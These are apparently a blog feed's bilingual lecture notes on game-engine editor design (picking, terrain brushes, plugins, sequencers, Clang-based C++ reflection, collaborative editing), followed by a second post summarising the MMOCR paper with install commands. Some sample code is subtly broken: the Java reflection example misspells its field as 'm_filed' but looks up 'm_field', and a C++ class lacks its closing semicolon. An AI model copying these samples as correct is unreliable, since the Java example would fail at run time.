    ​一切都是一个可编辑的对象

    webp

    • The editing requirements of all objects in the editor world are mostly the same, such as moving, adjusting parameters, etc

      编辑世界中所有对象的编辑要求大多是相同的,例如移动,调整参数等

    Different Views of Objects

    ​对象的不同视图

    • Display all of the objects within the scene

      显示场景中的所有对象

    • Organize objects in different views for user conveniences

      在不同视图中组织对象的用户便利

    webp

    Tree view

    webp

    Categories and groups

    Schema-Driven Object Property Editing

    ​模式驱动的对象属性编辑

    webp

    • Displays all of the editable properties for the selected objects

      显示所选对象的所有可编辑属性

    • Beyond schema, we can define some customized editing utilities for different types

      除了模式之外,我们还可以为不同类型的对象定义一些自定义的编辑实用程序

    Content Browser

    ​内容浏览器

    webp

    • Provide intuitive thumbnail of all assets

      提供所有资产的直观缩略图

    • Share asset among different projects

      在不同项目之间共享资产

    • Evolution of asset management from static file folder to content “ocean”

      资产管理从静态文件夹演变为内容“海洋”

    Editing Utilities in World Editor

    ​世界编辑器中的编辑实用程序

    webp

    ​便于用户编辑游戏对象的图示。

    Mouse Picking

    ​鼠标拾取

    Ray Casting

    射线投射

    webp

    Pros:

    • No cache required

      无需缓存

    • Can support multiple objects on selected rays

      可以支持选定射线上的多个对象

    Cons:

    • Poor query performance

      查询性能较差

    RTT

    webp

    Pros:

    • Easy to implement range queries

      易于实现范围查询

    • Ability to complete queries quickly

      能够快速完成查询

    Cons:

    • Need to draw an extra picture

      需要绘制额外的图片

    • Obstructed objects cannot be selected

      无法选择被遮挡的物体

    Object Transform Editing

    webp

    ​游戏引擎要便于用户对 Object 作 Transform Editing。

    Terrain

    webp

    Landform

    ​地形

    • Height map

      高度图

    Appearance

    ​外观

    • Texture map

      纹理图

    Vegetation

    ​植被

    • Tree instances

      树木实例

    • Decorator distribution map

      装饰器分布图

    Height Brush

    ​高度画笔

    webp

    • Draw height map to adjust terrain mesh

      绘制高度图以调整地形网格

      • Height change needs to be natural and smooth

        高度变化需要自然流畅

      • Can be easily adjusted to the desired results

        可以轻松调整到所需效果

        • Customized brush

          自定义画笔

    Instance Brush

    webp

    ​实例画笔(给地标种树)

    Pros:

    • Instance position is fixed

      实例位置固定

    • Available to further modification

      可进一步修改

    Cons:

    • Large amount of data

      数据量大

    Environment

    ​环境

    webp

    • Sky

      天空

    • Light

      灯光

    • Roads

    • Rivers

      河流

    From up to down, environment around us present a live world to the player. Edit these environment elements would also be important.

    ​从上到下,我们周围的环境为玩家呈现了一个生动的世界。编辑这些环境元素也很重要。

    Environment - Rule System

    webp

    ​有了这些规则更好地让用户创建合理的地形环境。

    Rules:

    ​规则:

    • Tree will not grow beside objects.

      树不会在物体旁边生长。

    • Tree will not grow in water.

      树不会在水中生长。

    • Tree will not grow on roads.

      树不会在道路上生长。

    Conclusion:

    ​结论:

    • Rule system handling data changes.

      规则系统处理数据变化。

    • Decoupled Environment systems.

      解耦环境系统。

    Editor Plugin Architecture

    ​编辑器插件架构

    Examples of Plug-in Module in Commercial Softwares

    ​商业软件中的插件模块示例

    webp

    A Cross Matrix between Systems and Objects

    ​系统与对象之间的交叉矩阵

    webp

    Any system and object type could be plug-ins to Editors

    ​任何系统和对象类型都可以成为编辑器的插件

    Combination of Multiple Plugins

    ​多种插件架构

    webp

    Covered

    ​覆盖

    • Only execute the newly registered logic, skip the original logic

      仅执行新注册的逻辑,跳过原始逻辑

    • Ex. Terrain editing overwrite

      例如地形编辑覆盖

    webp

    Distributed

    ​分布式

    • Each plugin will be executed, and if there is an output, the results will eventually be merged

      每个插件都会被执行,如果有输出,结果最终会被合并

    • Ex. Most special system editing seperately

      例如大多数特殊系统都是单独编辑的

    webp

    Pipeline

    ​管道

    • Input and output are connected to each other, generally input and output are the same data type

      输入和输出相互连接,通常输入和输出是相同的数据类型

    • Ex.Asset preprocessing, geometry for physics

      例如资产预处理、物理几何

    webp

    Onion rings

    ​洋葱圈

    • On the basis of the pipeline, the core logic of the system is in the middle, and the plug-in pays attention to the logic of entering and exiting at the same time

      在管线的基础上,系统的核心逻辑在中间,插件同时关注进入和退出的逻辑

    • Ex. Road editing plugin with terrain plugin

      Ex. 道路编辑插件与地形插件

    One More Thing-Version Control

    ​还有一件事-版本控制

    A certain version relationship is required between the plug-in and the host application to ensure that they can work together normally.

    ​插件和宿主应用之间需要有一定的版本关系,才能保证它们能够正常协同工作。

    • Plug-in use the same version number with the host application

      插件使用与宿主应用相同的版本号

    • Plug-in use the version number of the plug-in interface

      插件使用插件接口的版本号

      • This is more recommended because the update frequency of the plug-in interface and thesoftware may be different

        这是比较推荐的做法,因为插件接口和软件的更新频率可能不一样

    Design Narrative Tools

    ​设计叙述工具

    Storytelling in Game Engine

    ​游戏引擎中的故事叙述

    Control many parameters variance in the timeline

    ​控制时间轴中的许多参数变化

    webp

    Sequencer

    ​序列发生器(做动画的软件里常有)

    webp

    • Track: ln order to reference actors in your sequence. Any character, prop, camera, effect, or othelactors can be referenced and manipulated in Sequencer

      轨道:为了引用序列中的演员。任何角色、道具、摄像机、效果或其他演员都可以在 Sequencer 中引用和操纵

    • Property Track: Property of reference actors in track

      属性轨道:轨道中引用演员的属性

    • Timeline: A line describing time in discrete frames

      时间轴:描述离散帧中时间的线

    • Key Frame: The key fames can manipulate properties. Upon reaching a key frame in the timeline the track’s properties are updated to reflect the values you have defined at that point

      关键帧:关键帧可以操纵属性。到达时间轴中的关键帧后,轨道的属性将更新以反映您在该点定义的值

    • Sequence: Sequencer’s data

      序列:Sequencer 的数据

    Sequencer-Bind Objects to Track

    ​序列器-将对象绑定到跟踪

    webp

    How to let the sequencer control my “chick”

    ​如何让音序器控制我的“小鸡”

    • Bind the “chick” to Track

      将“小鸡”绑定到轨道

    Sequencer-Bind Object Property to Property Track

    ​Sequencer-将对象属性绑定到属性轨道

    How to control the moving position of the “chick”

    ​如何控制“小鸡”的移动位置

    • Bind position property toproperty track

      将位置属性绑定到属性轨道

    Sequencer-Set Key Frame

    ​Sequencer-设置关键帧

    How to make an “chick” reach a specified position

    ​如何让“小鸡”到达指定位置

    Sequencer-Set Key Frames

    ​序列器设置关键帧

    A, B, C, D are key frames.

    ​A、B、C、D 是关键帧。

    How “chick” go from A to B to C to D

    ​“小鸡”如何从 A 到 B 再到 C 再到 D

    webp

    Sequencer-Interpolate Properties along Key Frames

    ​Sequencer-沿关键帧插入属性

    Similar to animation, set key frames

    ​与动画类似,设置关键帧

    webp

    Reflection and GamePlay

    Reflection is Foundation of Sequencer

    ​反射是 Sequencer 的基础

    webp

    Any data in game engine can be bind into track based on reflection system

    ​游戏引擎中的任何数据都可以根据反射系统绑定到轨道中

    Complexity of Game Play

    Visual Scripting System

    webp

    ​可视化编程系统,如蓝图。

    Hard Code Method for More Feature

    ​硬编码方法实现更多功能,但是代码也更复杂。

    1
    2
    3
    4
    5
    6
    7
    8
    class Human: public object{
    void Jump() {
    // do something ...
    }
    void StopJump() {
    // do something ...
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    void CallFunction(object* instance, string type_name, string func_name)
    {
    if (type_name == "Human") {
    Human* human = (Human*)instance;
    if (func_name == "Jump") {
    human->Jump();
    }
    else if(func_name == "StopJump"){
    human->StopJump();
    }
    }
    }

    A Common Solution - Reflection

    ​常见解决方案 - 反射

    In computer science, reflective programming or reflection is the ability of a process to examine, introspect and modify its own structure and behavior.

    ​在计算机科学中,反射编程或反射是指进程检查、自省和修改自身结构和行为的能力。

    ​现在高级的语言编程都有反射的设计。

    JAVA Reflection

    1
    2
    3
    4
    5
    6
    7
    8
    package Demo;
    public class Test {
    public int m_filed;
    public void print()
    {
    System.out.print("call print().");
    };
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    package Demo;

    import java.lang.reflect.Field;
    import java.lang.reflect.Method;

    public class Demo {
        public static void main(String[] args) throws Exception {
            Class<?> cls = Class.forName("Demo.Test");
            Object obj = cls.getConstructor().newInstance();

            Field field_accessor = cls.getField("m_field");
            field_accessor.set(obj, 2);

            Method method_accessor = cls.getMethod("print");
            method_accessor.invoke(obj);
        }
    }

    Reflection Build the Bridge between Code and Tools

    ​反射在代码和工具之间搭建桥梁

    Using reflection to generate a code meta information map

    ​使用反射生成代码元信息映射

    • class_name, func_name and para_name

    • generate accessor and invoker

      生成访问器和调用器

    class Human : public Object {
        void Jump() {
            // do something ...
        }

        void StopJump() {
            // do something ...
        }
    };
    void callFunction(Object* instance, string type_name, string func_name)
    {
        FunctionPtr function_ptr = FunctionInfoMap::getInvokefunction(instance, type_name, func_name);
        function_ptr->invoke();
    }

    How to Implement Reflection in C++

    ​如何在 C++ 中实现反射

    • Collect type info from code

      从代码中收集类型信息

    • Generate code to provide accessors for fields and methods

      生成代码以提供字段和方法的访问器

    • Manage all accessors with a <string, accessor> map (a minimal sketch follows this list)

      使用 <string,accessor> 映射管理所有访问器
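
    A minimal sketch of such a registry, assuming a single type-erased FieldAccessor and a "Class.Field" key convention (names invented, not Piccolo's actual API):

    ```cpp
    #include <cassert>
    #include <functional>
    #include <map>
    #include <string>

    // Type-erased accessor for one field; generated code fills these in.
    struct FieldAccessor {
        std::function<void(void* instance, void* value)> set;
        std::function<void(void* instance, void* out)>   get;
    };

    // "Class.Field" -> accessor, populated by generated registration code.
    std::map<std::string, FieldAccessor>& fieldRegistry() {
        static std::map<std::string, FieldAccessor> registry;
        return registry;
    }

    struct Human { float jump_height = 1.0f; };

    // What the code generator would emit for Human::jump_height:
    static bool registered = [] {
        fieldRegistry()["Human.jump_height"] = {
            [](void* i, void* v) { static_cast<Human*>(i)->jump_height = *static_cast<float*>(v); },
            [](void* i, void* o) { *static_cast<float*>(o) = static_cast<Human*>(i)->jump_height; },
        };
        return true;
    }();

    int main() {
        Human h;
        float v = 2.5f;
        fieldRegistry()["Human.jump_height"].set(&h, &v); // no compile-time type needed
        assert(h.jump_height == 2.5f);
    }
    ```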

    How to Get Type Info from Code

    ​如何从代码中获取类型信息

    General Programming Language (GPL) Compilation Process

    ​通用编程语言 (GPL) 编译过程

    webp

    Abstract Syntax Tree (AST): An abstract representation of the syntax structure of source code. It represents the syntax structure of programming language in the form of a tree, and each node in the tree represents a construct in the source code.

    抽象语法树(AST):源代码语法结构的抽象表示。它以树的形式表示编程语言的语法结构,树中的每个节点代表源代码中的一个构造。

    webp

    Why Piccolo Use Clang

    webp

    One of Clang’s main goals is to provide a library-based architecture, so that the compiler could interoperate with other tools that interact with source code.

    ​Clang 的主要目标之一是提供基于库的架构,以便编译器可以与其他与源代码交互的工具进行互操作。

    Generate Schema From AST

    ​从 AST 生成模式

    webp

    • Parsing AST, such as type name, field name, field type, etc

      解析 AST,例如类型名称、字段名称、字段类型等

    • Build a temporary schema of the data in memory (a plausible shape is sketched after this list)

      在内存中构建数据的临时模式
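
    A plausible shape for that temporary schema (the field names here are invented for illustration):

    ```cpp
    #include <cstdio>
    #include <string>
    #include <vector>

    // Hypothetical in-memory schema filled in while walking the Clang AST.
    struct FieldSchema {
        std::string name;      // e.g. "jump_height"
        std::string type_name; // e.g. "float"
    };

    struct ClassSchema {
        std::string              name;    // e.g. "Human"
        std::vector<FieldSchema> fields;
        std::vector<std::string> methods; // e.g. {"Jump", "StopJump"}
    };

    int main() {
        ClassSchema human{"Human", {{"jump_height", "float"}}, {"Jump", "StopJump"}};
        std::printf("%s has %zu field(s)\n", human.name.c_str(), human.fields.size());
    }
    ```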

    Precise Control of Reflection Scope

    ​精确控制反射作用域

    webp

    In the actual scenario, we need to add a lot of tag information to identify the purpose of the type.

    ​实际场景中,我们需要添加很多标签信息来标识类型的用途。

    Use Macro to Add Reflection Controls

    ​使用宏添加反射控制

    webp

    Add tags by __attribute__

    ​通过 __attribute__ 添加标签

    • __attribute__ is a source code annotation provided by clang. In the code, the required data types can be captured by using these macros.

      __attribute__ 是 clang 提供的源代码注释,在代码中可以通过这些宏来捕获需要的数据类型。

    • Define a “CLASS” macro to distinguish between precompile and compile.

      定义一个 “CLASS” 宏来区分预编译和编译。

      • When precompiling, define the “__REFLECTION_PARSER__” macro in the meta parser to make the attribute information effective (a sketch follows)

        预编译时,在 meta parser 中定义“__REFLECTION_PARSER__”宏,使属性信息生效
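
    A sketch of the macro trick; the exact annotation payload and macro spelling are assumptions, but the mechanism (annotate the type only when the parser runs) is the one described above:

    ```cpp
    // When the meta parser (a Clang-based tool) runs, __REFLECTION_PARSER__ is
    // defined, so CLASS(...) expands to a class carrying an annotate attribute
    // that the parser can read out of the AST. In the normal compile the
    // attribute disappears and the compiler sees a plain class.
    #if defined(__REFLECTION_PARSER__)
    #define CLASS(name, ...) class __attribute__((annotate(#__VA_ARGS__))) name
    #else
    #define CLASS(name, ...) class name
    #endif

    CLASS(Human, Fields, Methods) {
    public:
        float jump_height = 1.0f;
        void  Jump() {}
    };
    ```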

    Reflection Accessors

    ​反射访问器

    webp

    Generate reflection accessors using schemas

    ​使用模式生成反射访问器

    • For classes, we need to generate type info getters

      对于类,我们需要生成类型信息获取器

    • For fields, we need to generate setters and getters that can access them

      对于字段,我们需要生成可以访问它们的设置器和获取器

    • For functions, we need to generate invokers that can invoke them

      对于函数,我们需要生成可以调用它们的调用器

    Code Rendering

    ​代码渲染

    Business code of the same type shares the same structure.

    ​同类型的业务代码结构都是一样的。

    webp

    Code Rendering

    ​代码渲染

    Code Rendering is the process of collecting data (if any) and loading related templates (or sending output directly). The collected data is then applied to the associated template. The final output is sent to the user.

    ​代码渲染是收集数据(如果有)并加载相关模板(或直接发送输出)的过程。然后将收集的数据应用于相关模板。最终输出将发送给用户。

    Pros:

    ​优点

    • Strong separation of code and data

      代码和数据完全分离

    Code Rendering-Mustache

    ​代码渲染-Mustache

    webp

    Mustache is a web template system.

    ​Mustache 是一个 Web 模板系统。

    It is named “Mustache” because of heavy use of braces, {{}}, that resemble a sideways moustache.

    ​它被命名为“Mustache”,因为它大量使用形似横放胡须的花括号 {{}}。

    Use Mustache to Code Generation

    ​使用 Mustache 进行代码生成

    webp

    • Implementing business logic using mustache templates

      使用 Mustache 模板实现业务逻辑

    • Generate code through Mustache rendering (a hand-rolled sketch follows this list)

      通过 Mustache 渲染生成代码
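
    To make the idea concrete, here is a hand-rolled sketch of template rendering; a real pipeline would use a Mustache library, this one just substitutes {{name}} placeholders in a string:

    ```cpp
    #include <cstdio>
    #include <map>
    #include <string>

    // Replace every {{key}} in 'tpl' with data.at(key) -- the essence of
    // rendering a schema into generated accessor code.
    std::string render(std::string tpl, const std::map<std::string, std::string>& data) {
        for (const auto& [key, value] : data) {
            const std::string tag = "{{" + key + "}}";
            for (size_t pos = tpl.find(tag); pos != std::string::npos; pos = tpl.find(tag, pos)) {
                tpl.replace(pos, tag.size(), value);
                pos += value.size();
            }
        }
        return tpl;
    }

    int main() {
        const std::string tpl =
            "void set_{{field}}({{type}} v) { m_instance->{{field}} = v; }";
        std::string code = render(tpl, {{"field", "jump_height"}, {"type", "float"}});
        std::puts(code.c_str()); // void set_jump_height(float v) { ... }
    }
    ```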

    Collaborative Editing

    ​协作编辑

    ​一个游戏开发项目可能需要多个人来协作编辑。

    Bottlenecks in Large Projects

    ​大型项目的瓶颈

    webp

    • Lots of people work with lots of assets

      许多人使用大量资产

    • Asset version management is very difficult

      资产版本管理非常困难

    Merging Conflicts is The Biggest Problem

    ​合并冲突是最大的问题

    webp

    • Everyone needs to spend a lot of time on merging conflicts when updating or uploading assets

      每个人在更新或上传资产时都需要花费大量时间解决合并冲突

    How to Reduce Conflicts

    ​如何减少冲突

    • Split assets into smaller parts to reduce the probability of conflicts

      将资产拆分成更小的部分以减少冲突的可能性

      • Layering the world

        分层世界

      • Divide the world

        划分世界

      • One file per actor (OFPA)

        每个演员一个文件 (OFPA)

    • All people work in the same scene to completely eliminate conflicts

      所有人都在同一个场景中工作以完全消除冲突

    Split Assets-Layering the World

    ​拆分资产 - 分层世界

    webp

    • Split the world into many layers, each of which is stored in an asset file

      将世界拆分成多个层,每个层都存储在资产文件中

    • Different people work on different layers

      不同的人在不同的层面上工作

    Pros

    • Appropriate layering decreases edit conflicts

      适当的层会减少编辑冲突

    • Layer-based logic available

      提供基于层的逻辑

    Cons

    • Layer logic may depend on another layer

      层逻辑可能依赖于另一层

    • Difficult to reasonably split layers when the world is very complex

      当世界非常复杂时,很难合理地拆分层

    Split Assets- Divide the World

    ​分割资产 - 划分世界

    webp

    • The world is divided into fixed size blocks, and each block is saved in an asset file

      世界被划分为固定大小的区块,每个区块都保存在资产文件中

    • Different people work on different blocks

      不同的人在不同的区块工作

    Pros

    • Location based splitting makes it easy to dynamically expand the world

      基于位置的分割使动态扩展世界变得容易

    • Spatial separation is more intuitive to operators

      空间分离对操作员来说更直观

    Cons

    • Difficult to deal with objects across multiple blocks

      难以处理跨多个块的对象

    One File Per Actor

    ​每个 Actor 一个文件

    webp

    A splitting method introduced by Unreal Engine 5

    ​Unreal Engine 5 提出的一种拆分方法

    • reduces overlap between users by saving data for instances of Actors in external files, removing the need to save the main Level file when making changes to its Actors

      通过将 Actor 实例的数据保存在外部文件中来减少用户之间的重叠,无需在更改 Actor 时保存主关卡文件

    • All Actors are embedded in their respective Level files when cooked

      烘焙后,所有 Actor 都嵌入到各自的关卡文件中

    A Special Way to Split Assets-OFPA

    ​资产分割的特殊方法-OFPA

    webp

    Pros

    • Fine-grained scene division, fewer edit conflicts

      场景划分细粒度,编辑冲突更少

    • Only need to save objects modified

      只需保存修改的对象

    Cons

    • Massive files to manage, more burden for version control

      需要管理大量文件,版本控制负担更重

    • Cooking slows down when embedding many OFPA files into the level file

      将许多 OFPA 文件嵌入关卡文件时,Cook 速度会变慢

    Coordinate Editing in One Scene

    ​在一个场景中协调编辑

    webp

    Connect multiple instances of world editor together to work collaboratively in a shared editing session, building a single virtual world together with your teammates and colleagues in real time.

    ​将多个世界编辑器实例连接在一起,在共享编辑会话中协同工作,实时与您的队友和同事一起构建一个虚拟世界。

    How to Synchronize My Operations with Others

    ​如何将我的操作与他人同步

    webp

    Do you remember the command system?

    ​你还记得命令系统吗?

    • Serialize my commands and send them to server

      序列化我的命令并将其发送到服务器

    • Receive commands from server and deserialize them

      从服务器接收命令并反序列化它们

    • Invoke commands (a toy example follows this list)

      调用命令
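
    A toy illustration of the round trip; the wire format and the MoveCommand type are invented for this sketch, a real editor would serialize its actual command objects:

    ```cpp
    #include <cstdio>
    #include <sstream>
    #include <string>

    // One editor command serialized to a line of text that the collaboration
    // server can relay to every other editor instance.
    struct MoveCommand {
        std::string actor;
        float x, y, z;

        std::string serialize() const {
            std::ostringstream os;
            os << "move " << actor << ' ' << x << ' ' << y << ' ' << z;
            return os.str();
        }

        static MoveCommand deserialize(const std::string& line) {
            std::istringstream is(line);
            std::string op;
            MoveCommand cmd;
            is >> op >> cmd.actor >> cmd.x >> cmd.y >> cmd.z;
            return cmd;
        }

        void invoke() const { std::printf("moving %s to (%g, %g, %g)\n", actor.c_str(), x, y, z); }
    };

    int main() {
        // Sender side: serialize and (conceptually) send to the server.
        std::string wire = MoveCommand{"chick", 1.f, 2.f, 3.f}.serialize();
        // Receiver side: deserialize what the server relayed, then invoke.
        MoveCommand::deserialize(wire).invoke();
    }
    ```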

    There is A Very Big Challenge

    ​有一个非常大的挑战

    How to ensure the consistency of distributed operations?

    ​如何保证分布式操作的一致性?

    webp

    Undo/Redo

    webp

    Operation Merge

    Two Users Cannot Edit The Same Instance at The Same Time

    ​两个用户不能同时编辑同一个实例

    Instance lock: Avoid multiple people modifying the same instance at the same time

    实例锁:避免多人同时修改同一个实例

    webp

    Two Users Cannot Edit The Same Asset at The Same Time

    ​两个用户不能同时编辑同一资产

    webp

    Asset lock: Avoid multiple people modifying the same asset at the same time

    资产锁定:避免多人同时修改同一资产

    But Lock is not Omnipotent

    webp

    If there are three users working in the same world, and now User2 presses the undo button, what do we expect to happen? If he presses the redo button next?

    ​如果有三个用户在同一个世界中工作,现在用户 2 按下了撤消按钮,我们期望发生什么?如果他接下来按下重做按钮?

    How to Solve These Problems Thoroughly

    ​如何彻底解决这些问题

    Operation Transform (OT): Abstract operations into an operation sequence composed of N enumerable atomic operation types

    操作转换 (OT):将操作抽象为由可枚举的 N 个原子操作类型组成的操作序列

    Conflict-free Replicated Data Type (CRDT): A data structure that is replicated across multiple computers in a network, with the following features:

    无冲突复制数据类型 (CRDT):在网络中的多台计算机上复制的数据结构,具有以下特点:

    • The application can update any replica independently, concurrently and without coordinating with other replicas

      应用程序可以独立、并发地更新任何副本,而无需与其他副本协调

    • An algorithm (itself part of the data type) automatically resolves any inconsistencies that might occur

      算法(本身是数据类型的一部分)会自动解决可能发生的任何不一致问题

    • Although replicas may have different states at any particular point in time, they are guaranteed to eventually converge (a minimal CRDT sketch follows this list)

      虽然副本在任何特定时间点可能具有不同的状态,但它们最终会收敛
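
    For intuition, here is a sketch of one of the simplest CRDTs, a grow-only counter: each replica increments only its own slot, and merge takes element-wise maxima, so replicas converge no matter how states are exchanged (illustrative only; a collaborative editor needs much richer CRDTs):

    ```cpp
    #include <algorithm>
    #include <array>
    #include <cstdio>
    #include <numeric>

    constexpr int kReplicas = 3;

    struct GCounter {
        std::array<long, kReplicas> slots{}; // one slot per replica

        void increment(int replica_id) { ++slots[replica_id]; }
        long value() const { return std::accumulate(slots.begin(), slots.end(), 0L); }

        // Merging is commutative, associative, and idempotent, so replicas can
        // exchange state in any order and still converge to the same value.
        void merge(const GCounter& other) {
            for (int i = 0; i < kReplicas; ++i)
                slots[i] = std::max(slots[i], other.slots[i]);
        }
    };

    int main() {
        GCounter a, b;
        a.increment(0); a.increment(0); // replica 0 edits twice
        b.increment(1);                 // replica 1 edits concurrently
        a.merge(b); b.merge(a);         // exchange state in any order
        std::printf("%ld %ld\n", a.value(), b.value()); // both print 3
    }
    ```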

    Traditional Workflow vs. Collaborative Editing Workflow

    ​传统工作流程与协作编辑工作流程

    webp

    Traditional Workflow

    webp

    Collaborative Editing Workflow

    Server is the Most Important Role

    ​服务器是最重要的角色

    webp

    Client

    ​客户端

    • Crash

      崩溃

    • Maloperation

      操作不当

    Server

    ​服务器

    • Crash

      崩溃

    • The server retains each session until the user who created the session expressly deletes it, or until the server itself is shut down.

      服务器保留每个会话,直到创建会话的用户明确删除它,或直到服务器本身关闭。

    • Save session records to disk

      将会话记录保存到磁盘

    References

    ]]>
    @@ -1782,7 +1782,7 @@ /posts/Paper-MMOCR-A%20Comprehensive%20Toolbox%20for%20Text%20Detection,%20Recognition%20and%20Understanding/ - 配置

    资源

    正文

    Abstract

    ​我们提出了 MMOCR——一个开源工具箱,它提供了覆盖文本检测与识别及其下游任务(如命名实体识别和关键信息提取)的完整管线。MMOCR 实现了 14 种最先进的算法,比我们迄今所知的所有现有开源 OCR 项目都多。为了促进文本识别相关问题的未来研究和工业应用,我们还提供了大量预训练模型和详细的基准测试,以便深入了解文本检测、识别和理解的性能。MMOCR 在 https://github.com/open-mmlab/mmocr 上公开发布。

    1 INTRODUCTION

    ​不同的方法使用不同的训练数据集、优化策略(例如优化器、学习率调度、训练轮数、预训练权重和数据增强管线)和网络设计(例如网络架构和损失函数)。为了涵盖各种模型所用组件的多样性,我们提出了 MMOCR 工具箱,在统一框架中覆盖了近来流行的文本检测、识别和理解方法。截至目前,工具箱实现了七种文本检测方法、五种文本识别方法、一种关键信息提取方法和一种命名实体识别方法。整合各种算法提高了代码的可复用性,从而大大简化了算法的实现。此外,统一框架允许公平地比较不同方法,并可以方便地研究其关键有效组件。据我们所知,MMOCR 在各类开源工具箱中重新实现了最多的基于深度学习的文本检测和识别方法,我们认为这将促进未来文本检测、识别和理解的研究。

    ​MMOCR 在 Apache-2.0 许可证下于 https://github.com/open-mmlab/mmocr 公开发布。该仓库包含所有源代码和详细文档,包括安装说明、数据集准备脚本、API 文档、模型库、教程和用户手册。MMOCR 重新实现了十多种最先进的文本检测、识别和理解算法,并提供了在流行学术数据集上训练的大量基准和模型。为了支持多语言 OCR 任务,MMOCR 还发布了在工业数据集上训练的中文文本识别模型。除了(分布式)训练和测试脚本,MMOCR 还提供了一套丰富的实用工具,涵盖可视化、演示和部署。MMOCR 提供的模型很容易转换为 ONNX,后者得到了部署框架和硬件设备的广泛支持。因此,它对学术研究人员和工业开发人员都很有用。

    • 文本检测。文本检测旨在将文本实例的边界框进行定位。最近的研究重点已转移到具有挑战性的 arbitrary-shaped text detection

      • Mask R-CNN 可用于检测文本,由于基于矩形的 ROI 建议,它可能无法检测弯曲和密集的文本。
      • 另一方面,TextSnake 用一系列有序的重叠圆盘来描述文本实例。
      • PSENet 提出了一种渐进式规模扩展网络,可以区分位置接近的弯曲文本实例。
      • DB 通过向分割网络提出可微分二值化函数来简化场景文本分割的二值化后处理,其中图像概率图的每个点处的阈值可以自适应地预测。
    • 文本识别。文本识别由于能够从文本图像中提取丰富的语义信息而受到越来越多的关注。

      • 卷积递归神经网络(CRNN)使用端到端的可训练神经网络,该网络由用于特征提取的深度卷积神经网络(DCNN),用于顺序预测的递归神经网络(RNN)和用于产生标签序列的转录层组成。
      • RobustScanner 能够通过使用新的位置增强分支和动态融合模块来识别无上下文文本,从而减轻随机文本图像的误识别问题。
      • 已努力将不规则文本输入纠正为与典型文本识别器兼容的规则文本。例如,薄板样条(TPS)变换在深度神经网络中使用,该深度神经网络结合了空间 Transformer 网络(STN)和序列识别网络(SRN),以在将弯曲和透视文本输入 SRN 之前纠正它们。
    • 关键信息提取。非结构化文档图像(如收据或信用票据)的关键信息提取(KIE)最主要用于办公自动化任务,包括高效存档和合规性检查。传统的方法,如模板匹配,不能很好地推广看不见的模板的文档。提出了几种模型来解决泛化问题。

      • 例如,CloudScan 使用 NER 来分析整个发票的连接一维文本序列。
      • Chargrid 将每个文档页面编码为一个二维字符网格进行语义分割,但由于它只覆盖了小邻域的二维空间布局信息,不能充分利用文本区域之间的非局部、远距离的空间关系。
      • 最近,已经开发了一种端到端的空间双模态图推理(SDMG-R)模型,该模型对文本识别错误特别鲁棒。它将非结构化文档图像建模为空间双模态图,图节点作为检测到的文本框,图边缘作为节点之间的空间关系。
    • 命名实体识别。命名实体识别(NER)旨在定位命名实体并将其分类为预定义的类别,例如个人或组织的名称。它们基于双向 LSTM 或条件随机场。

    webp

    • 开源 OCR 工具箱。多年来,已经开发了几种开源 OCR 工具箱,以满足学术界和行业的日益增长的需求。
      • Tesseract 是开源 OCR 工具箱的先驱。它于 2005 年公开发布,并提供了从图像中提取印刷体文本的 CLI 工具。最初,它遵循传统的分步管线,包括连通组件分析、文本行查找、基线拟合、等宽字符检测与切分、按比例间距的单词查找和单词识别。现在,它支持基于 LSTM 的 OCR 引擎,并支持 100 多种语言。
      • 基于深度学习的开源 OCR 工具箱 EasyOCR 于最近发布。它为工业用户提供了简单的 API,并支持 80 多种语言。它实现了 CRAFT 检测器和 CRNN 识别器。但是,它仅用于推理,不支持模型训练。
      • chineseocr 是另一个流行的开源 OCR 工具箱。它分别使用 YOLOv3 和 CRNN 进行文本检测和识别,并使用 OpenCV DNN 进行深度模型推理。
      • 相比之下,chineseocr_lite 提供了轻量的中文检测和识别工具箱,它使用 DB 检测文本、CRNN 识别文本。它提供了基于 NCNN 和 TNN 的前向推理,并且可以轻松部署在 Windows、Linux 和 Android 等多个平台上。
      • PaddleOCR 是基于 PaddlePaddle 的实用开源 OCR 工具箱,可以部署在 Linux、Windows 和 macOS 等多个平台上。目前,它支持 80 多种语言,并实现了三种文本检测方法(EAST、DB 和 SAST)、五种识别方法(CRNN、Rosetta、STAR-Net、RARE 和 SRN),以及一种端到端的文本检测识别方法(PGNet)。

    3 TEXT DETECTION STUDIES

    ​深度学习模型的性能受许多重要因素影响。在本节中,我们研究了网络架构的主干和颈部。我们在不同基于分割的文本检测方法之间交换上述组件,以衡量性能和计算复杂度的影响。

    webp

    Backbone。ResNet18 和 ResNet50 在文本检测方法中常被使用。为了实际应用,我们还介绍了一种适用于 GPU 的轻量级主干 ddrnet23-slim。表中比较了将 ResNet18、ResNet50 和 ddrnet23-slim 插入 PSENet、PAN 和 DB 中的 FLOPs 和 H-mean。结果显示,ddrnet23-slim 的表现略逊于 ResNet18 和 ResNet50,其 FLOPs 分别仅为 ResNet18 和 ResNet50 的 45% 和 21%。

    webp

    Neck。PSENet、PAN 和 DB 提出了不同的类似 FPN 的颈部结构来融合多尺度特征。我们在表中的实验结果显示,PSENet 中提出的 FPNF 可以在 PSENet 和 DB 中达到最佳的 H-mean。然而,它的 FLOPs 明显高于 DB 中提出的 PFNC 和 PAN 中提出的 FPEM_FFM。相比之下,FPEM_FFM 在 PAN 中拥有最低的 FLOPs,并且达到最佳的 H-mean。

    4 CONCLUSIONS

    ​我们已经公开发布了 MMOCR,这是一个涵盖文本检测、识别和理解的综合工具包。MMOCR 已经实现了 14 种最先进的算法,比所有现有的开源 OCR 项目都要多。此外,它提供了广泛的训练模型、基准测试、详细的文档和实用工具。在本报告中,我们广泛地将 MMOCR 与其他开源 OCR 项目进行了比较。此外,我们还引入了一种适用于 GPU 的轻量级主干 ddrnet23-slim,并对主干和颈部的影响进行了认真研究,以指导工业应用中的检测性能和计算复杂度。

    代码

    安装

    ​创建虚拟环境:

    conda create -n open-mmlab python=3.8
    conda activate open-mmlab

    ​离线安装 pytorch 和 torchvision:

    pip install torch-1.13.1+cu117-cp38-cp38-win_amd64.whl
    pip install torchvision-0.14.1+cu117-cp38-cp38-win_amd64.whl

    ​使用 MIM 安装 MMEngine、MMCV、MMDetection:

    pip install -U openmim
    mim install mmengine
    mim install mmcv
    mim install mmdet

    ​从 open-mmlab/mmocr: OpenMMLab Text Detection, Recognition and Understanding Toolbox (github.com) 获取代码,进入该文件夹后执行:

    pip install -v -e .
    # "-v" 会让安装过程产生更详细的输出
